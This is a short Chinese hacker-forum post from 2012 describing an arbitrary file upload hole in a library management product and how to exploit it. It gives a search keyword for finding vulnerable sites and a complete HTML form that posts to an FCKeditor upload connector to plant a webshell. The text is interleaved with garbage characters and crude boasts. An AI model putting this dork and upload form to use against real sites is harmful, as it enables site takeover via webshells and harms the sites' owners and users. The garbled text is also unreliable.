主题:图书馆系统任意文件上传漏洞
) K- @& E+ I$ ]6 @2 F- H0 b& t: ] 作者:冰锋刺客7 y. h8 m3 k& ?3 G7 Z
厂商:点击书(dianjishu.com)( e6 A; p0 E2 D8 ?) k
日期:2012-6-21+ F' F4 p" \: M d1 [* E$ u
6 p) i* r/ [# q! S$ t0 a5 J) b
I 概述* Q& b+ R5 n# @, c6 h/ x. q: {
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell2 ~. c* S$ L+ U6 C' _
II 简介4 A7 S5 U+ f+ r/ {7 b, d
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"6 x, u$ K- q" y5 M" d4 p
补充一个漏洞4 k, m1 s" |, F, V: Y5 a
<form id="frmUpload" enctype="multipart/form-data"
7 C; Y s* I! u action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
4 N* V& c% y Z p <input id="btnUpload" type="submit" value="操翻他">4 v/ Y7 ?" j4 p! s: V. y3 ~0 Q
</form>
1 U- p/ @- y, H5 A5 y 你们懂的$ s( u: g0 s8 y# Y5 @& _/ x
那傻逼提供还需要改包.
4 }, R6 Z$ o5 y3 L 自己看了下源代码发现fckeditor
/ u6 l7 `' x1 F 直接秒杀
( G2 X7 L. U+ s J |